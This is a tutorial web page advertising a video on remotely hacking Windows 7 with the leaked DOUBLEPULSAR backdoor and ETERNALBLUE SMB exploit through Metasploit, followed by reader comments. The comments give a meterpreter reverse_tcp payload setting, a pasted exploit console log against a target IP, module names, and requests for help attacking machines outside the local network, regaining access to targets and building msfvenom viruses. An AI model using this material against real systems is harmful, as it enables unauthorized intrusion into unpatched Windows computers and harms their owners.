Trending Tutorials

Hack Windows 7 Remotely Using DOUBLEPULSAR — NSA Hacking Tool



DOUBLEPULSAR is a backdoor that was leaked from the NSA by a group of hackers called Shadow Brokers.
It is makes use of an exploit called ETERNALBLUE, based on a vulnerability in SMB.

This works with Windows 8.1, Windows 7, Windows Server 2008 and all versions of Windows older than Windows 7, including Vista and XP.

This video demonstrates how DOUBLEPULSAR is used to hack Windows 7 computers remotely using Metasploit with just an IP…

26 Comments on Hack Windows 7 Remotely Using DOUBLEPULSAR — NSA Hacking Tool

  1. nixuya ne ponyato na schet yazika, no ya uchus'..hi from Ukr.

  2. use "set PAYLOAD windows/x64/meterpreter/reverse_tcp" if you're getting the "Error sending wrong architecture DLL to target"

  3. bro Exploit failed: Errno: : ENOENT No such file or directory @ rb_sysopen – /root/.wine/dirve_c/eternal11.dll (how to fix this)

  4. Yo arcane what’s the song name I can’t find it o really like it

  5. Doesn't work

    [*] Started reverse TCP handler on 192.168.178.24:4444
    [*] 192.168.178.30:445 – Generating Eternalblue XML data
    [*] 192.168.178.30:445 – Generating Doublepulsar XML data
    [*] 192.168.178.30:445 – Generating payload DLL for Doublepulsar
    [*] 192.168.178.30:445 – Writing DLL in /root/.wine/drive_c/eternal11.dll
    [*] 192.168.178.30:445 – Launching Eternalblue…
    000f:err:service:process_send_command receiving command result timed out
    0014:err:service:process_send_command receiving command result timed out
    0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
    [-] Error getting output back from Core; aborting…
    [-] 192.168.178.30:445 – Are you sure it's vulnerable?
    [*] 192.168.178.30:445 – Launching Doublepulsar…
    000f:err:service:process_send_command receiving command result timed out
    [-] 192.168.178.30:445 – Oops, something was wrong!
    [*] Exploit completed, but no session was created.

    its windows xp also scanner shows it is vulnerable

  6. is that kali light ? orr

  7. If i wanted to re access the target machine what should i do ?

  8. How do you download a text file? Like the smb one.

  9. i'm not able to find .msf4 folder in my root.When i want to create .msf4 folder it show that folder already exist,but i'm not able to search that where is it.what can i do now…??

  10. Really good video at last one with a working mic !! Nice one thanks ..

  11. Is only for computers from the same network?

  12. How to fix this error saying are you sure it’s vulnerable?
    Oops, something was wrong! Can anyone help? Thanks

  13. What is the cve vunerability details ?

  14. how can i tranfer and open a exe file?

  15. failed to load module

  16. bro it says " exploit completed , no session was created " how to solve it

  17. hey bro how i can make it in wan not lan? im new in this

  18. Exploit failed : Errno: :Enoent no such file directory @rb_sysopen – /root/.wine/drive_c/eternal11.dll
    Exploit completed, but no session was created. ????
    Help me Lol

  19. If the victim is outside the local network, can I "check it for security"? And if I make a virus using msfvenom and there it is necessary to enter my ip, then enter local or public?

  20. Its only your internal system but how we get another system same network

  21. [-] Failed to load module: auxilary/scanner/smb/smb_ms17_010

  22. use this remote port exploit windows/scada/scadapro_cmdexe

Leave a Reply to The world is here Cancel reply

Your email address will not be published.


*